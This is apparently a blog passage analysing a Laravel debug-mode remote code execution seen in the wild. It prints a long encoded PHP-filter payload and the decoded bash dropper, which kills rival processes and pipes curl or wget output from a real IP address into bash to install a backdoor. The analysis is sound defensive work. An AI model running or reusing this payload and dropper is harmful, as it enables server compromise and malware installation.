You can see that the attacker is utilizing a feature from the debug mode to achieve remote code execution, and they have used a strange obfuscation technique. To investigate further, I searched for the keyword MakeViewVariableOptionalSolution on Google and came across this article: Laravel Debug RCE.
I decided to test it on my server with debug mode enabled, but it didn't work. After referencing a Stack Overflow post, I realized that I hadn't configured the facade/ignition properly, which caused it to fail.
This raised a pressing question in my mind, "How did the attacker manage to gain RCE (Remote Code Execution)?" At this point, I have discovered the answer, but we will delve into it further in the next article. Stay tuned!.
Bonus
You want to know what is this right?
=50=00=44=00=39=00=77=00=61=00=48=...snip...
Aperently this is a payload that will be processed using the php filter. if we parsed it like this in python:
we will get:
5044397761484167583139495155785558304E505456424A544556534B436B374944382B4451703042514141415141414142454141414142414141414141412B42514141547A6F794F546F6954573975623278765A3178495957356B6247567958454A315A6D5A6C636B6868626D52735A5849694F6A633665334D364D5441364967417141476868626D52735A5849694F3038364D7A5536496B3176626D397362326463534746755A47786C636C784F59585270646D564E59576C735A584A495957356B62475679496A6F334F6E747A4F6A55364967417141485276496A744F4F334D364D5441364967417141484E31596D706C593351694F303437637A6F784D446F6941436F41614756685A47567963794937546A747A4F6A6736496741714147786C646D5673496A744F4F334D364F546F6941436F41596E5669596D786C496A74694F6A4137637A6F784D6A6F6941436F415A6D39796257463064475679496A744F4F334D364D544D36496741714148427962324E6C63334E76636E4D694F3245364D6A703761546F774F334D364E7A6F6959335679636D56756443493761546F784F334D364E6A6F6963336C7A64475674496A743966584D364D544D364967417141474A315A6D5A6C636C4E70656D55694F326B364C544537637A6F354F6949414B67426964575A6D5A5849694F3245364D54703761546F774F3245364D6A703761546F774F334D364F446B304F694A6C59326876494442695A4463354F5442684943596D4947566A6147386753586C46646C6C746248564D4D6B706F597A4A6E53324E48644842695233646E5446645A5A325675546A4A5A6433423359544A7363324A445158526161554A33576B6457625670584E5774615745707251323543636D465865484E4A517A46745355685764317048526A426156303576576C644F636C7059536D74445A3342745A466331616D524862485A6961554A6D57444A4F4D574E746432394C5530493351326C425A324E74566D686151304A33593230354D474A35516E706157456F79576C684A5A324E48526A4268513045345545523361307448566D7068527A686E536B687A654578354F485A4D65554935533146765A306C46556C4252656A4232536B683064316C59556D394D6554686E54486B354F554E705157645452546C55566B51776132557A546D786A626C707359326B34646B397063446C446155466E5655553555315A454D47746C4D3035735932356162474E704F485A4C616E413551326C425A3163786332646C51306C725A54426F55465578556A6C4A6155453555464E434E456C70556A645652546C54566B677761556C474D57524A51316C7453555A435546567355546C505245464C51326C425A3170596147785A6555463655455130646C7048566A4A4D4D314A7159304D3461325577614642564D56493554486C5355565178536C56446155466E576C644F62324A3551585261567A526E5357746B526C5A445157746C4D464A5155544D775A314E47556C5656517A68345447704359324E7365485654527A6C365A4552765A30704964456C554D5535565A6C5A34655668484E574E6A6248683153576C424B3070715455744A513046765A444A6F63474A485657646A62565A6F576B4E43633246584E57785065554A72596E64765A306C44516D4A5865554670536B643463474A7456576C4A5244413553554E52626C68495357354A526A466B53554E5A62556C48536E6C6156305A7951326C425A3170484F58566155304674536D6C43616C6C595558424A52486474545864765A306C48566A52615630316E54586F306255785263446C445A334277576D6C43596B6C444D54524A51306C725330644F646D4A584D5768696256466E5446685A5A316B7A566E6C6951327470535559774E306C49556D3961567A524C53554E43616D5259536E4E4A52455531546B4D304E4535354E486C4F56456C31545652564E55777965486C4D626B35765A6B644B61474D795A30746156336877576D6C43596B6C444D54524A51306C725330644F646D4A584D5768696256466E5446685A5A3251795A47786B51327470535559774E306C49556D3961567A524C53554E434D316F79566A424A517A463453554D785545785451586850564646315430526A6455317156586C4D616B557854314D3563324E704E587068534868705756684F62304E74566E4E6A4D6C564C53554E435A6C6779546A466A6258646E595568534D474E4562335A4D656B5531546B4D304E4535354E486C4F56456C31545652564E55777965486C4E615456365955683461566C59546D39446256707766474A68633255324E4341745A48786959584E6F4943596D4947566A614738674D474A6B4E7A6B354D4745694F334D364E546F69624756325A5777694F3034376658317A4F6A6736496741714147786C646D5673496A744F4F334D364F546F6941436F41596E5669596D786C496A74694F6A4137637A6F784D6A6F6941436F415A6D39796257463064475679496A744F4F334D364D544D36496741714148427962324E6C63334E76636E4D694F30343766516741414142305A584E304C6E5234644151414141414141414141424141414141782B6639696B41514141414141414148526C6333546A6A45666C5559544D2F4E41486A63462B385A6333435A7A337667494141414248516B3143a
After parsing the encoded text using the tool called CyberChef, we obtained the following results:
In the output, we observed a suspicious-looking base64 encoded text:
Upon decoding it again, we uncovered a script:
#!/bin/bash
pkill -f zsvc
pkill -f pdefenderd
pkill -f updatecheckerd
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
if [ -x "$(command -v curl)" ]; then
curl 194.87.252.159/lr.sh|bash
elif [ -x "$(command -v wget)" ]; then
wget -q -O- 194.87.252.159/lr.sh|bash
else
__curl http://194.87.252.159/lr2.sh|bash
fi
This script is designed to download a backdoor from the site http://194.87.252.159/lr2.sh.
Read more
TCP1P Writeup
image
Feb 25, 2024X Et Et Challenge Writeup (TETCTF 2024)
solve.py
Jan 29, 2024Cyber Jawara 2023 Writeup
Cyber Jawara 2023 Quals Writeup
Dec 4, 2023National Cyber Week 2023 Quals Writeup
I have recently created a web app that provides online ZIP extraction functionality to help people avoid malware disguised as a ZIP file 🗿
Nov 19, 2023Published on 
HackMD
HackMD